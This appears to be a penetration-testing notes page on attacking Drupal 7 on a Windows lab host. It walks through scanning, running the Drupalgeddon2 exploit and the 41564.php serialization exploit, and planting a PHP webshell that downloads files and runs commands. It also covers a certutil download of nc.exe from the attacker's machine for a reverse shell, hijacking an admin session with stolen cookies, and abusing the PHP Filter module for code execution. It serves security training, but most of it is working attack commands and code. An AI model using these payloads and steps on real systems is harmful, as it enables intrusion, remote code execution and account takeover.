Drupal

https://www.drupal.org
Open-source web content management framework written in PHP

Scan

nmap -sC -sV -oA output 10.x.x.x

80     IIS 7.5 drupal = Windows 2008 R2
135    rpc
49154  rpc
 
DirBuster found 'rest': /rest/ — 200

http://10.x.x.x  ..drupal

drupscan

Works but too old - last updated like 2013
github/tibillys

droopescan

Takes a long time to run
http://$IP/CHANGELOG.txt ..Find Version
http://$IP/robots.txt

droopescan --help
droopescan scan drupal -u 10.x.x.x

version: 7.54        ..Interesting Results
Admin: Login page    ..But no exploits
Theme: seven
ctools, libraries,
image module

drupalgeddon (msf)

searchsploit drupal 7.5

drupalgeddon (no msf)

CVE-2018-7600
https://github.com/dreadlocked/Drupalgeddon2
If you get a 'limited shell' you will need to upload nc.exe and do reverse shell

gem install highline
ruby drupalgeddon2.rb 10.x.x.x

nc -nvlp 4444
certutil -urlcache -split -f http://$MyIP/nc.exe
nc.exe -e cmd.exe $MyIP 4444

Serialization Vulnerability - 41564.php

Search and Download the php exploit
ippsec includes Custom phpCode for:
- Uploading and Execution
- Requires php-curl
Exploit will download json files that could have secrets

google drupal 7.54 exploits  ..found one
searchsploit drupal          ..found 7.x
searchsploit -x 41564.php    ..view
searchsploit -p 41564.php    ..clipboard
mv 41564.php drupal.php      ..move/rename

Confirm rest:
http://10.x.x.x/rest_endpoint  ..nothing
http://10.x.x.x/rest           ..ok

$url = 'http://10.x.x.x/'
$endpoint_path = '/rest_endpoint'    ..default/wrong
$endpoint_path = '/rest';            ..found by dirbuster

$phpCode = <<<'EOD'
<?php
 if (isset($_REQUEST['fupload'])) {
  file_put_contents($_REQUEST['fupload], file_get_contents("http://10.x.x.x:8000/" . $_REQUEST['fupload']));
 };
 if (isset($_REQUEST['fexec'])) {
  echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
 };
?>
EOD;

$file= [
        'filename' => 'ippsec.php',
        'data' => $phpCode
];

Exploit:
> php drupal.php

Json Cookies

Exploit will save json files locally
Check them for details, and session cookies to steal
Create a New Cookie, and you might get Admin

cat user.json      ..user/pass
cat session.json   ..session/admin/cookie

firefox > cookies manager+ (addon) > New Cookie
cat session.json
session_name = Name: xyz111
session_id   = Content: ddddd
<save>
http://10.x.x.x/   ..we are admin!!

Dupal PHP Module

If you can access Drupal:
- Enable the PHP Filter
- Create an Article that has PHP

Drupal > Modules > PHP Filter (enable) > save
Add Content > Create Article
Title: test
Body: <?php phpinfo(); ?>
Format: PHP Code
Preview ... we have code execution!

Webshell

Use the ippsec phpCode
Execute commands and upload

http://10.x.x.x/ippsec.php?fexec=dir
http://10.x.x.x/ippsec.php?fexec=systeminfo
http://10.x.x.x/ippsec.php?fexec=sc query state=all   ..denied

Enumeration

systeminfo will tell us the OS version and Patch level
Hotfix 'N/A' might mean we dont have access, or there are no patches
OS/Patch level will help us with KernelExploit

OS Ver: 6.1.7600 B/A Build 7600
Hotfix: N/A
Kernel Exploit

PreviousContent Management (CMS)NextElastix FreePBX

Last updated 2 years ago

Was this helpful?